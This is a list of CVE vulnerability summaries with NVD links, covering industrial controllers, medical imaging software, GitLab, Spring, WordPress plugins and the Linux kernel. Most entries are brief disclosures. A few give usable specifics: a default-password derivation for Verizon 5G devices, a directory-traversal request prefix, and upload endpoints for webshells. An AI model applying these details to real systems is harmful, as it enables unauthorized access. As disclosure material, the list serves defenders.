CVE-2021-32961 A getfile function in MDT AutoSave versions prior to v6.02.06 enables a user to supply an optional parameter, resulting in the processing of a request in a special manner. This can result in the execution of an unzip command and place a malicious .exe file in one of the locations the function looks for and get execution capabilities. https://nvd.nist.gov/vuln/detail/CVE-2021-32961
CVE-2021-32968 Two buffer overflows in the built-in web server in Moxa NPort IAW5000A-I/O Series firmware version 2.2 or earlier may allow a remote attacker to cause a denial-of-service condition. https://nvd.nist.gov/vuln/detail/CVE-2021-32968
CVE-2021-32970 Data can be copied without validation in the built-in web server in Moxa NPort IAW5000A-I/O series firmware version 2.2 or earlier, which may allow a remote attacker to cause denial-of-service conditions. https://nvd.nist.gov/vuln/detail/CVE-2021-32970
CVE-2021-32974 Improper input validation in the built-in web server in Moxa NPort IAW5000A-I/O series firmware version 2.2 or earlier may allow a remote attacker to execute commands. https://nvd.nist.gov/vuln/detail/CVE-2021-32974
CVE-2021-32976 Five buffer overflows in the built-in web server in Moxa NPort IAW5000A-I/O series firmware version 2.2 or earlier may allow a remote attacker to initiate a denial-of-service attack and execute arbitrary code. https://nvd.nist.gov/vuln/detail/CVE-2021-32976
CVE-2021-33018 The use of a broken or risky cryptographic algorithm in Philips Vue PACS versions 12.2.x.x and prior is an unnecessary risk that may result in the exposure of sensitive information. https://nvd.nist.gov/vuln/detail/CVE-2021-33018
CVE-2021-33020 Philips Vue PACS versions 12.2.x.x and prior uses a cryptographic key or password past its expiration date, which diminishes its safety significantly by increasing the timing window for cracking attacks against that key. https://nvd.nist.gov/vuln/detail/CVE-2021-33020
CVE-2021-33022 Philips Vue PACS versions 12.2.x.x and prior transmits sensitive or security-critical data in cleartext in a communication channel that can be sniffed by unauthorized actors. https://nvd.nist.gov/vuln/detail/CVE-2021-33022
CVE-2021-33024 Philips Vue PACS versions 12.2.x.x and prior transmits or stores authentication credentials, but it uses an insecure method susceptible to unauthorized interception and/or retrieval. https://nvd.nist.gov/vuln/detail/CVE-2021-33024
CVE-2021-33657 There is a heap overflow problem in video/SDL_pixels.c in SDL (Simple DirectMedia Layer) 2.x to 2.0.18 versions. By crafting a malicious .BMP file, an attacker can cause the application using this library to crash, denial of service or Code execution. https://nvd.nist.gov/vuln/detail/CVE-2021-33657
CVE-2021-39908 In all versions of GitLab CE/EE, certain Unicode characters can be abused to commit malicious code into projects without being noticed in merge request or source code viewer UI. https://nvd.nist.gov/vuln/detail/CVE-2021-39908
CVE-2021-3461 A flaw was found in keycloak where keycloak may fail to logout user session if the logout request comes from external SAML identity provider and Principal Type is set to Attribute [Name]. https://nvd.nist.gov/vuln/detail/CVE-2021-3461
CVE-2021-3847 An unauthorized access to the execution of the setuid file with capabilities flaw in the Linux kernel OverlayFS subsystem was found in the way user copying a capable file from a nosuid mount into another mount. A local user could use this flaw to escalate their privileges on the system. https://nvd.nist.gov/vuln/detail/CVE-2021-3847
CVE-2022-0373 Improper access control in GitLab CE/EE versions 12.4 to 14.5.4, 14.5 to 14.6.4, and 12.6 to 14.7.1 allows project non-members to retrieve the service desk email address https://nvd.nist.gov/vuln/detail/CVE-2022-0373
CVE-2022-0390 Improper access control in Gitlab CE/EE versions 12.7 to 14.5.4, 14.6 to 14.6.4, and 14.7 to 14.7.1 allowed for project non-members to retrieve issue details when it was linked to an item from the vulnerability dashboard. https://nvd.nist.gov/vuln/detail/CVE-2022-0390
CVE-2022-0425 A DNS rebinding vulnerability in the Irker IRC Gateway integration in all versions of GitLab CE/EE since version 7.9 allows an attacker to trigger Server Side Request Forgery (SSRF) attacks. https://nvd.nist.gov/vuln/detail/CVE-2022-0425
CVE-2022-0489 An issue has been discovered in GitLab CE/EE affecting all versions starting with 8.15 . It was possible to trigger a DOS by using the math feature with a specific formula in issue comments. https://nvd.nist.gov/vuln/detail/CVE-2022-0489
CVE-2022-0741 Improper input validation in all versions of GitLab CE/EE using sendmail to send emails allowed an attacker to steal environment variables via specially crafted email addresses. https://nvd.nist.gov/vuln/detail/CVE-2022-0741
CVE-2022-0922 The software does not perform any authentication for critical system functionality. https://nvd.nist.gov/vuln/detail/CVE-2022-0922
CVE-2022-1018 When opening a malicious solution file provided by an attacker, the application suffers from an XML external entity vulnerability due to an unsafe call within a dynamic link library file. An attacker could exploit this to pass data from local files to a remote web server, leading to a loss of confidentiality. https://nvd.nist.gov/vuln/detail/CVE-2022-1018
CVE-2022-1068 Modbus Tools Modbus Slave (versions 7.4.2 and prior) is vulnerable to a stack-based buffer overflow in the registration field. This may cause the program to crash when a long character string is used. https://nvd.nist.gov/vuln/detail/CVE-2022-1068
CVE-2022-1098 Delta Electronics DIAEnergie (all versions prior to 1.8.02.004) are vulnerable to a DLL hijacking condition. When combined with the Incorrect Default Permissions vulnerability of 4.2.2 above, this makes it possible for an attacker to escalate privileges https://nvd.nist.gov/vuln/detail/CVE-2022-1098
CVE-2022-1159 Rockwell Automation Studio 5000 Logix Designer (all versions) are vulnerable when an attacker who achieves administrator access on a workstation running Studio 5000 Logix Designer could inject controller code undetectable to a user. https://nvd.nist.gov/vuln/detail/CVE-2022-1159
CVE-2022-21830 A blind self XSS vulnerability exists in RocketChat LiveChat <v1.9 that could allow an attacker to trick a victim pasting malicious code in their chat instance. https://nvd.nist.gov/vuln/detail/CVE-2022-21830
CVE-2022-22570 A buffer overflow vulnerability found in the UniFi Door Access Reader Lite’s (UA Lite) firmware (Version 3.8.28.24 and earlier) allows a malicious actor who has gained access to a network to control all connected UA devices. This vulnerability is fixed in Version 3.8.31.13 and later. https://nvd.nist.gov/vuln/detail/CVE-2022-22570
CVE-2022-22950 n Spring Framework versions 5.3.0 - 5.3.16 and older unsupported versions, it is possible for a user to provide a specially crafted SpEL expression that may cause a denial of service condition. https://nvd.nist.gov/vuln/detail/CVE-2022-22950
CVE-2022-22963 In Spring Cloud Function versions 3.1.6, 3.2.2 and older unsupported versions, when using routing functionality it is possible for a user to provide a specially crafted SpEL as a routing-expression that may result in remote code execution and access to local resources. https://nvd.nist.gov/vuln/detail/CVE-2022-22963
CVE-2022-22965 A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it. https://nvd.nist.gov/vuln/detail/CVE-2022-22965
CVE-2022-25155 Use of Password Hash Instead of Password for Authentication vulnerability in Mitsubishi Electric MELSEC iQ-F series FX5U(C) CPU all versions and Mitsubishi Electric MELSEC iQ-F series FX5UJ CPU all versions allows a remote unauthenticated attacker to login to the product by replaying an eavesdropped password hash. https://nvd.nist.gov/vuln/detail/CVE-2022-25155
CVE-2022-25156 Use of Weak Hash vulnerability in Mitsubishi Electric MELSEC iQ-F series FX5U(C) CPU all versions and Mitsubishi Electric MELSEC iQ-F series FX5UJ CPU all versions allows a remote unauthenticated attacker to login to the product by using a password reversed from a previously eavesdropped password hash. https://nvd.nist.gov/vuln/detail/CVE-2022-25156
CVE-2022-25157 Use of Password Hash Instead of Password for Authentication vulnerability in Mitsubishi Electric MELSEC iQ-F series FX5U(C) CPU all versions and Mitsubishi Electric MELSEC iQ-F series FX5UJ CPU all versions allows a remote unauthenticated attacker to disclose or tamper with the information in the product by using an eavesdropped password hash. https://nvd.nist.gov/vuln/detail/CVE-2022-25157
CVE-2022-25158 Cleartext Storage of Sensitive Information vulnerability in Mitsubishi Electric MELSEC iQ-F series FX5U(C) CPU all versions and Mitsubishi Electric MELSEC iQ-F series FX5UJ CPU all versions allows a remote attacker to disclose or tamper with a file in which password hash is saved in cleartext. https://nvd.nist.gov/vuln/detail/CVE-2022-25158
CVE-2022-25159 Authentication Bypass by Capture-replay vulnerability in Mitsubishi Electric MELSEC iQ-F series FX5U(C) CPU all versions and Mitsubishi Electric MELSEC iQ-F series FX5UJ CPU all versions allows a remote unauthenticated attacker to login to the product by replay attack. https://nvd.nist.gov/vuln/detail/CVE-2022-25159
CVE-2022-25160 Cleartext Storage of Sensitive Information vulnerability in Mitsubishi Electric MELSEC iQ-F series FX5U(C) CPU all versions and Mitsubishi Electric MELSEC iQ-F series FX5UJ CPU all versions allows a remote unauthenticated attacker to disclose a file in a legitimate user's product by using previously eavesdropped cleartext information and to counterfeit a legitimate user's system. https://nvd.nist.gov/vuln/detail/CVE-2022-25160
CVE-2022-25959 Omron CX-Position (versions 2.5.3 and prior) is vulnerable to memory corruption while processing a specific project file, which may allow an attacker to execute arbitrary code. https://nvd.nist.gov/vuln/detail/CVE-2022-25959
CVE-2022-26022 Omron CX-Position (versions 2.5.3 and prior) is vulnerable to an out-of-bounds write while processing a specific project file, which may allow an attacker to execute arbitrary code. https://nvd.nist.gov/vuln/detail/CVE-2022-26022
CVE-2022-26417 Omron CX-Position (versions 2.5.3 and prior) is vulnerable to a use after free memory condition while processing a specific project file, which may allow an attacker to execute arbitrary code. https://nvd.nist.gov/vuln/detail/CVE-2022-26417
CVE-2022-26419 Omron CX-Position (versions 2.5.3 and prior) is vulnerable to multiple stack-based buffer overflow conditions while parsing a specific project file, which may allow an attacker to locally execute arbitrary code. https://nvd.nist.gov/vuln/detail/CVE-2022-26419
CVE-2022-27177 A Python format string issue leading to information disclosure and potentially remote code execution in ConsoleMe for all versions prior to 1.2.2 https://nvd.nist.gov/vuln/detail/CVE-2022-27177
CVE-2022-27534 Kaspersky Anti-Virus products for home and Kaspersky Endpoint Security with antivirus databases released before 12 March 2022 had a bug in a data parsing module that potentially allowed an attacker to execute arbitrary code. The fix was delivered automatically. Credits: Georgy Zaytsev (Positive Technologies). https://nvd.nist.gov/vuln/detail/CVE-2022-27534
CVE-2022-1201 NULL Pointer Dereference in mrb_vm_exec with super in GitHub repository mruby/mruby prior to 3.2. This vulnerability is capable of making the mruby interpreter crash, thus affecting the availability of the system. https://nvd.nist.gov/vuln/detail/CVE-2022-1201
CVE-2022-28352 WeeChat (aka Wee Enhanced Environment for Chat) 3.2 to 3.4 before 3.4.1 does not properly verify the TLS certificate of the server, after certain GnuTLS options are changed, which allows man-in-the-middle attackers to spoof a TLS chat server via an arbitrary certificate. NOTE: this only affects situations where weechat.network.gnutls_ca_system or weechat.network.gnutls_ca_user is changed without a WeeChat restart. https://nvd.nist.gov/vuln/detail/CVE-2022-28352
CVE-2022-28355 randomUUID in Scala.js before 1.10.0 generates predictable values. https://nvd.nist.gov/vuln/detail/CVE-2022-28355
CVE-2022-28356 In the Linux kernel before 5.17.1, a refcount leak bug was found in net/llc/af_llc.c. https://nvd.nist.gov/vuln/detail/CVE-2022-28356
CVE-2022-28368 Dompdf 1.2.1 allows remote code execution via a .php file in the src:url field of an @font-face Cascading Style Sheets (CSS) statement (within an HTML input file). https://nvd.nist.gov/vuln/detail/CVE-2022-28368
CVE-2022-28376 Verizon LVSKIHP 5G outside devices through 2022-02-15 allow anyone (knowing the device's serial number) to access a CPE admin website, e.g., at the 10.0.0.1 IP address. The password (for the verizon username) is calculated by concatenating the serial number and the model (i.e., the LVSKIHP string), running the sha256sum program, and extracting the first seven characters concatenated with the last seven characters of that SHA-256 value. https://nvd.nist.gov/vuln/detail/CVE-2022-28376
CVE-2022-0088 Cross-Site Request Forgery (CSRF) in GitHub repository yourls/yourls prior to 1.8.3. https://nvd.nist.gov/vuln/detail/CVE-2022-0088
CVE-2022-1210 A vulnerability classified as problematic was found in LibTIFF 4.3.0. Affected by this vulnerability is the TIFF File Handler of tiff2ps. Opening a malicious file leads to a denial of service. The attack can be launched remotely but requires user interaction. The exploit has been disclosed to the public and may be used. https://nvd.nist.gov/vuln/detail/CVE-2022-1210
CVE-2022-1211 A vulnerability classified as critical has been found in tildearrow Furnace dev73. This affects the FUR to VGM converter in console mode which causes stack-based overflows and crashes. It is possible to initiate the attack remotely but it requires user-interaction. A POC has been disclosed to the public and may be used. https://nvd.nist.gov/vuln/detail/CVE-2022-1211
CVE-2022-28378 Craft CMS before 3.7.29 allows XSS. https://nvd.nist.gov/vuln/detail/CVE-2022-28378
CVE-2022-28379 jc21.com Nginx Proxy Manager before 2.9.17 allows XSS during item deletion. https://nvd.nist.gov/vuln/detail/CVE-2022-28379
CVE-2022-28380 The rc-httpd component through 2022-03-31 for 9front (Plan 9 fork) allows ..%2f directory traversal if serve-static is used. https://nvd.nist.gov/vuln/detail/CVE-2022-28380
CVE-2022-0405 Improper Access Control in GitHub repository janeczku/calibre-web prior to 0.6.16. https://nvd.nist.gov/vuln/detail/CVE-2022-0405
CVE-2022-0406 Improper Authorization in GitHub repository janeczku/calibre-web prior to 0.6.16. https://nvd.nist.gov/vuln/detail/CVE-2022-0406
CVE-2022-28381 Mediaserver.exe in ALLMediaServer 1.6 has a stack-based buffer overflow that allows remote attackers to execute arbitrary code via a long string to TCP port 888, a related issue to CVE-2017-17932. https://nvd.nist.gov/vuln/detail/CVE-2022-28381
CVE-2022-28388 usb_8dev_start_xmit in drivers/net/can/usb/usb_8dev.c in the Linux kernel through 5.17.1 has a double free. https://nvd.nist.gov/vuln/detail/CVE-2022-28388
CVE-2022-28389 mcba_usb_start_xmit in drivers/net/can/usb/mcba_usb.c in the Linux kernel through 5.17.1 has a double free. https://nvd.nist.gov/vuln/detail/CVE-2022-28389
CVE-2022-28390 ems_usb_start_xmit in drivers/net/can/usb/ems_usb.c in the Linux kernel through 5.17.1 has a double free. https://nvd.nist.gov/vuln/detail/CVE-2022-28390
CVE-2022-28391 BusyBox through 1.35.0 allows remote attackers to execute arbitrary code if netstat is used to print a DNS PTR record's value to a VT compatible terminal. Alternatively, the attacker could choose to change the terminal's colors. https://nvd.nist.gov/vuln/detail/CVE-2022-28391
CVE-2021-30061 On Schneider Electric ConneXium Tofino Firewall TCSEFEA23F3F22 before 03.23, TCSEFEA23F3F20/21, and Belden Tofino Xenon Security Appliance, physically proximate attackers can execute code via a crafted file on a USB stick. https://nvd.nist.gov/vuln/detail/CVE-2021-30061
CVE-2021-30062 On Schneider Electric ConneXium Tofino OPCLSM TCSEFM0000 before 03.23 and Belden Tofino Xenon Security Appliance, crafted OPC packets can bypass the OPC enforcer. https://nvd.nist.gov/vuln/detail/CVE-2021-30062
CVE-2021-30063 On Schneider Electric ConneXium Tofino OPCLSM TCSEFM0000 before 03.23 and Belden Tofino Xenon Security Appliance, crafted OPC packets can cause an OPC enforcer denial of service. https://nvd.nist.gov/vuln/detail/CVE-2021-30063
CVE-2021-30064 On Schneider Electric ConneXium Tofino Firewall TCSEFEA23F3F22 before 03.23, TCSEFEA23F3F20/21, and Belden Tofino Xenon Security Appliance, an SSH login can succeed with hardcoded default credentials (if the device is in the uncommissioned state). https://nvd.nist.gov/vuln/detail/CVE-2021-30064
CVE-2021-30065 On Schneider Electric ConneXium Tofino Firewall TCSEFEA23F3F22 before 03.23, TCSEFEA23F3F20/21, and Belden Tofino Xenon Security Appliance, crafted ModBus packets can bypass the ModBus enforcer. NOTE: this issue exists because of an incomplete fix of CVE-2017-11401. https://nvd.nist.gov/vuln/detail/CVE-2021-30065
CVE-2021-30066 On Schneider Electric ConneXium Tofino Firewall TCSEFEA23F3F22 before 03.23, TCSEFEA23F3F20/21, and Belden Tofino Xenon Security Appliance, an arbitrary firmware image can be loaded because firmware signature verification (for a USB stick) can be bypassed. NOTE: this issue exists because of an incomplete fix of CVE-2017-11400. https://nvd.nist.gov/vuln/detail/CVE-2021-30066
CVE-2022-26233 Barco Control Room Management through Suite 2.9 Build 0275 was discovered to be vulnerable to directory traversal, allowing attackers to access sensitive information and components. Requests must begin with the "GET /..\\.." substring. https://nvd.nist.gov/vuln/detail/CVE-2022-26233
CVE-2022-26530 swaylock before 1.6 allows attackers to trigger a crash and achieve unlocked access to a Wayland compositor. https://nvd.nist.gov/vuln/detail/CVE-2022-26530
CVE-2022-27248 A directory traversal vulnerability in IdeaRE RefTree before 2021.09.17 allows remote authenticated users to download arbitrary .dwg files from a remote server by specifying an absolute or relative path when invoking the affected DownloadDwg endpoint. An attack uses the path field to CaddemServiceJS/CaddemService.svc/rest/DownloadDwg. https://nvd.nist.gov/vuln/detail/CVE-2022-27248
CVE-2022-27249 An unrestricted file upload vulnerability in IdeaRE RefTree before 2021.09.17 allows remote authenticated users to execute arbitrary code by using UploadDwg to upload a crafted aspx file to the web root, and then visiting the URL for this aspx resource. https://nvd.nist.gov/vuln/detail/CVE-2022-27249
CVE-2022-0939 Server-Side Request Forgery (SSRF) in GitHub repository janeczku/calibre-web prior to 0.6.18. https://nvd.nist.gov/vuln/detail/CVE-2022-0939
CVE-2022-1222 Inf loop in GitHub repository gpac/gpac prior to 2.1.0-DEV. https://nvd.nist.gov/vuln/detail/CVE-2022-1222
CVE-2022-1223 Improper Access Control in GitHub repository phpipam/phpipam prior to 1.4.6. https://nvd.nist.gov/vuln/detail/CVE-2022-1223
CVE-2022-1224 Improper Authorization in GitHub repository phpipam/phpipam prior to 1.4.6. https://nvd.nist.gov/vuln/detail/CVE-2022-1224
CVE-2022-1225 Incorrect Privilege Assignment in GitHub repository phpipam/phpipam prior to 1.4.6. https://nvd.nist.gov/vuln/detail/CVE-2022-1225
CVE-2022-24191 In HTMLDOC 1.9.14, an infinite loop in the gif_read_lzw function can lead to a pointer arbitrarily pointing to heap memory and resulting in a buffer overflow. https://nvd.nist.gov/vuln/detail/CVE-2022-24191
CVE-2021-33616 RSA Archer 6.x through 6.9 SP1 P4 (6.9.1.4) allows stored XSS. https://nvd.nist.gov/vuln/detail/CVE-2021-33616
CVE-2021-36775 a Improper Access Control vulnerability in SUSE Rancher allows users to keep privileges that should have been revoked. This issue affects: SUSE Rancher Rancher versions prior to 2.4.18; Rancher versions prior to 2.5.12; Rancher versions prior to 2.6.3. https://nvd.nist.gov/vuln/detail/CVE-2021-36775
CVE-2021-36776 A Improper Access Control vulnerability in SUSE Rancher allows remote attackers impersonate arbitrary users. This issue affects: SUSE Rancher Rancher versions prior to 2.5.10. https://nvd.nist.gov/vuln/detail/CVE-2021-36776
CVE-2021-44138 There is a Directory traversal vulnerability in Caucho Resin, as distributed in Resin 4.0.52 - 4.0.56, which allows remote attackers to read files in arbitrary directories via a ; in a pathname within an HTTP request. https://nvd.nist.gov/vuln/detail/CVE-2021-44138
CVE-2022-26616 PKP Vendor Open Journal System v2.4.8 to v3.3.8 allows attackers to perform reflected cross-site scripting (XSS) attacks via crafted HTTP headers. https://nvd.nist.gov/vuln/detail/CVE-2022-26616
CVE-2022-27435 An unrestricted file upload at /public/admin/index.php?add_product of Ecommerce-Website v1.1.0 allows attackers to upload a webshell via the Product Image component. https://nvd.nist.gov/vuln/detail/CVE-2022-27435
CVE-2022-27436 A cross-site scripting (XSS) vulnerability in /public/admin/index.php?add_user at Ecommerce-Website v1.1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the username text field. https://nvd.nist.gov/vuln/detail/CVE-2022-27436
CVE-2022-28062 Car Rental System v1.0 contains an arbitrary file upload vulnerability via the Add Car component which allows attackers to upload a webshell and execute arbitrary code. https://nvd.nist.gov/vuln/detail/CVE-2022-28062
CVE-2022-28063 Simple Bakery Shop Management System v1.0 contains a file disclosure via /bsms/?page=products. https://nvd.nist.gov/vuln/detail/CVE-2022-28063
CVE-2021-43454 An Unquoted Service Path vulnerability exists in AnyTXT Searcher 1.2.394 via a specially crafted file in the ATService path. . https://nvd.nist.gov/vuln/detail/CVE-2021-43454
CVE-2021-43455 An Unquoted Service Path vulnerability exists in FreeLAN 2.2 via a specially crafted file in the FreeLAN Service path. https://nvd.nist.gov/vuln/detail/CVE-2021-43455
CVE-2021-43456 An Unquoted Service Path vulnerablility exists in Rumble Mail Server 0.51.3135 via via a specially crafted file in the RumbleService executable service path. https://nvd.nist.gov/vuln/detail/CVE-2021-43456
CVE-2021-43457 An Unquoted Service Path vulnerability exists in bVPN 2.5.1 via a specially crafted file in the waselvpnserv service path. https://nvd.nist.gov/vuln/detail/CVE-2021-43457
CVE-2021-43458 An Unquoted Service Path vulnerability exits in Vembu BDR 4.2.0.1 via a specially crafted file in the (1) hsflowd, (2) VembuBDR360Agent, or (3) VembuOffice365Agent service paths. https://nvd.nist.gov/vuln/detail/CVE-2021-43458
CVE-2022-1026 Kyocera multifunction printers running vulnerable versions of Net View unintentionally expose sensitive user information, including usernames and passwords, through an insufficiently protected address book export function. https://nvd.nist.gov/vuln/detail/CVE-2022-1026
CVE-2021-25048 The KingComposer WordPress plugin through 2.9.6 does not have authorisation, CSRF and sanitisation/escaping when creating profile, allowing any authenticated users to create arbitrary ones, with Cross-Site Scripting payloads in them https://nvd.nist.gov/vuln/detail/CVE-2021-25048
CVE-2021-25113 The Dropdown Menu Widget WordPress plugin through 1.9.7 does not have authorisation and CSRF checks when saving its settings, allowing low privilege users such as subscriber to update them. Due to the lack of sanitisation and escaping, it could also lead to Stored Cross-Site Scripting issues https://nvd.nist.gov/vuln/detail/CVE-2021-25113
CVE-2021-43459 A Cross Site Scripting (XSS) vulnerability exists in Rumble Mail Server 0.51.3135 via the (1) domain and (2) path parameters. https://nvd.nist.gov/vuln/detail/CVE-2021-43459
CVE-2021-43460 An Unquoted Service Path vulnerability exists in System Explorer 7.0.0 via via a specially crafted file in the SystemExplorerHelpService service executable path. https://nvd.nist.gov/vuln/detail/CVE-2021-43460
CVE-2021-43461 Cross Site Scripting (XSS) vulnerability exists in Rumble Mail Server 0.51.3135 via the servername parameter. https://nvd.nist.gov/vuln/detail/CVE-2021-43461
CVE-2021-43462 A Cross Site Scripting (XSS) vulnerability exists in Rumble Mail Server 0.51.3135 via the username parameter. https://nvd.nist.gov/vuln/detail/CVE-2021-43462
CVE-2021-43463 An Unquoted Service Path vulnerability exists in Ext2Fsd v0.68 via a specially crafted file in the Ext2Srv Service executable service path. https://nvd.nist.gov/vuln/detail/CVE-2021-43463
CVE-2022-0403 The Library File Manager WordPress plugin before 5.2.3 is using an outdated version of the elFinder library, which is know to be affected by security issues (CVE-2021-32682), and does not have any authorisation as well as CSRF checks in its connector AJAX action, allowing any authenticated users, such as subscriber to call it. Furthermore, as the options passed to the elFinder library does not restrict any file type, users with a role as low as subscriber can Create/Upload/Delete Arbitrary files and folders. https://nvd.nist.gov/vuln/detail/CVE-2022-0403
CVE-2022-0404 The Material Design for Contact Form 7 WordPress plugin through 2.6.4 does not check authorization or that the option mentioned in the notice param belongs to the plugin when processing requests to the cf7md_dismiss_notice action, allowing any logged in user (with roles as low as Subscriber) to set arbitrary options to true, potentially leading to Denial of Service by breaking the site. https://nvd.nist.gov/vuln/detail/CVE-2022-0404
CVE-2022-0431 The Insights from Google PageSpeed WordPress plugin before 4.0.4 does not sanitise and escape various parameters before outputting them back in attributes in the plugin's settings dashboard, leading to Reflected Cross-Site Scripting https://nvd.nist.gov/vuln/detail/CVE-2022-0431
CVE-2022-0537 The MapPress Maps for WordPress plugin before 2.73.13 allows a high privileged user to bypass the DISALLOW_FILE_EDIT and DISALLOW_FILE_MODS settings and upload arbitrary files to the site through the "ajax_save" function. The file is written relative to the current 's stylesheet directory, and a .php file extension is added. No validation is performed on the content of the file, triggering an RCE vulnerability by uploading a web shell. Further the name parameter is not sanitized, allowing the payload to be uploaded to any directory to which the server has write access. https://nvd.nist.gov/vuln/detail/CVE-2022-0537
CVE-2022-0709 The Booking Package WordPress plugin before 1.5.29 requires a token for exporting the ical representation of it's booking calendar, but this token is returned in the json response to unauthenticated users performing a booking, leading to a sensitive data disclosure vulnerability. https://nvd.nist.gov/vuln/detail/CVE-2022-0709
CVE-2022-0825 The Amelia WordPress plugin before 1.0.49 does not have proper authorisation when managing appointments, allowing any customer to update other's booking status, as well as retrieve sensitive information about the bookings, such as the full name and phone number of the person who booked it. https://nvd.nist.gov/vuln/detail/CVE-2022-0825
CVE-2022-0830 The FormBuilder WordPress plugin through 1.08 does not have CSRF checks in place when creating/updating and deleting forms, and does not sanitise as well as escape its form field values. As a result, attackers could make logged in admin update and delete arbitrary forms via a CSRF attack, and put Cross-Site Scripting payloads in them. https://nvd.nist.gov/vuln/detail/CVE-2022-0830
CVE-2022-0837 The Amelia WordPress plugin before 1.0.48 does not have proper authorisation when handling Amelia SMS service, allowing any customer to send paid test SMS notification as well as retrieve sensitive information about the admin, such as the email, account balance and payment history. A malicious actor can abuse this vulnerability to drain out the account balance by keep sending SMS notification. https://nvd.nist.gov/vuln/detail/CVE-2022-0837
CVE-2022-0864 The UpdraftPlus WordPress Backup Plugin WordPress plugin before 1.22.9 does not sanitise and escape the updraft_interval parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting (XSS) vulnerability. https://nvd.nist.gov/vuln/detail/CVE-2022-0864
CVE-2022-0884 The Profile Builder WordPress plugin before 3.6.8 does not sanitise and escape Form Fields titles and description, which could allow high privilege user such as admin to perform Criss-Site Scripting attacks even when unfiltered_html is disallowed https://nvd.nist.gov/vuln/detail/CVE-2022-0884
CVE-2022-0887 The Easy Social Icons WordPress plugin before 3.1.4 does not sanitize the selected_icons attribute to the cnss_widget before using it in an SQL statement, leading to a SQL injection vulnerability. https://nvd.nist.gov/vuln/detail/CVE-2022-0887
CVE-2022-0901 The Ad Inserter Free and Pro WordPress plugins before 2.7.12 do not sanitise and escape the REQUEST_URI before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting in browsers which do not encode characters https://nvd.nist.gov/vuln/detail/CVE-2022-0901
CVE-2022-0958 The Mark Posts WordPress plugin before 2.0.1 does not escape new markers, allowing high privilege users such as admin to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed https://nvd.nist.gov/vuln/detail/CVE-2022-0958
CVE-2022-1164 The Wyzi Theme was affected by reflected XSS vulnerabilities in the business search feature https://nvd.nist.gov/vuln/detail/CVE-2022-1164
CVE-2022-1165 The Blackhole for Bad Bots WordPress plugin before 3.3.2 uses headers such as CF-CONNECTING-IP, CLIENT-IP etc to determine the IP address of requests hitting the blackhole URL, which allows them to be spoofed. This could result in blocking arbitrary IP addresses, such as legitimate/good search engine crawlers / bots. This could also be abused by competitors to cause damage related to visibility in search engines, can be used to bypass arbitrary blocks caused by this plugin, block any visitor or even the administrator and even more. https://nvd.nist.gov/vuln/detail/CVE-2022-1165
CVE-2022-1166 The JobMonster Theme was vulnerable to Directory Listing in the /wp-content/uploads/jobmonster/ folder, as it did not include a default PHP file, or .htaccess file. This could expose personal data such as people's resumes. Although Directory Listing can be prevented by securely configuring the web server, vendors can also take measures to make it less likely to happen. https://nvd.nist.gov/vuln/detail/CVE-2022-1166
CVE-2022-1167 There are unauthenticated reflected Cross-Site Scripting (XSS) vulnerabilities in CareerUp Careerup WordPress theme before 2.3.1, via the filter parameters. https://nvd.nist.gov/vuln/detail/CVE-2022-1167
CVE-2022-1168 There is a Cross-Site Scripting vulnerability in the JobSearch WP JobSearch WordPress plugin before 1.5.1. https://nvd.nist.gov/vuln/detail/CVE-2022-1168
CVE-2022-1169 There is a XSS vulnerability in Careerfy. https://nvd.nist.gov/vuln/detail/CVE-2022-1169
CVE-2022-1170 In the Noo JobMonster WordPress theme before 4.5.2.9 JobMonster there is a XSS vulnerability as the input for the search form is provided through unsanitized GET requests. https://nvd.nist.gov/vuln/detail/CVE-2022-1170
CVE-2020-28062 An Access Control vulnerability exists in HisiPHP 2.0.11 via special packets that are constructed in $files = Dir::getList($decompath. '/ Upload/Plugins /, which could let a remote malicious user execute arbitrary code. https://nvd.nist.gov/vuln/detail/CVE-2020-28062
CVE-2022-24785 Moment.js is a JavaScript date library for parsing, validating, manipulating, and formatting dates. A path traversal vulnerability impacts npm (server) users of Moment.js between versions 1.0.1 and 2.29.1, especially if a user-provided locale string is directly used to switch moment locale. This problem is patched in 2.29.2, and the patch can be applied to all affected versions. As a workaround, sanitize the user-provided locale name before passing it to Moment.js. https://nvd.nist.gov/vuln/detail/CVE-2022-24785
CVE-2021-43464 A Remiote Code Execution (RCE) vulnerability exiss in Subrion CMS 4.2.1 via modified code in a background field; when the information is modified, the data in it will be executed through eval(). https://nvd.nist.gov/vuln/detail/CVE-2021-43464
CVE-2022-0990 Server-Side Request Forgery (SSRF) in GitHub repository janeczku/calibre-web prior to 0.6.18. https://nvd.nist.gov/vuln/detail/CVE-2022-0990
CVE-2022-24787 Vyper is a Pythonic Smart Contract Language for the Ethereum Virtual Machine. In version 0.3.1 and prior, bytestrings can have dirty bytes in them, resulting in the word-for-word comparisons giving incorrect results. Even without dirty nonzero bytes, two bytestrings can compare to equal if one ends with `"\\x00"` because there is no comparison of the length. A patch is available and expected to be part of the 0.3.2 release. There are currently no known workarounds. https://nvd.nist.gov/vuln/detail/CVE-2022-24787
CVE-2022-24801 Twisted is an event-based framework for internet applications, supporting Python 3.6+. Prior to version 22.4.0rc1, the Twisted Web HTTP 1.1 server, located in the `twisted.web.http` module, parsed several HTTP request constructs more leniently than permitted by RFC 7230. This non-conformant parsing can lead to desync if requests pass through multiple HTTP parsers, potentially resulting in HTTP request smuggling. Users who may be affected use Twisted Web's HTTP 1.1 server and/or proxy and also pass requests through a different HTTP server and/or proxy. The Twisted Web client is not affected. The HTTP 2.0 server uses a different parser, so it is not affected. The issue has been addressed in Twisted 22.4.0rc1. Two workarounds are available: Ensure any vulnerabilities in upstream proxies have been addressed, such as by upgrading them; or filter malformed requests by other means, such as configuration of an upstream proxy. https://nvd.nist.gov/vuln/detail/CVE-2022-24801
CVE-2022-24813 CreateWiki is Miraheze's MediaWiki extension for requesting & creating wikis. Without the patch for this issue, anonymous comments can be made using Special:RequestWikiQueue when sent directly via POST. A patch for this issue is available in the `master` branch of CreateWiki's GitHub repository. https://nvd.nist.gov/vuln/detail/CVE-2022-24813
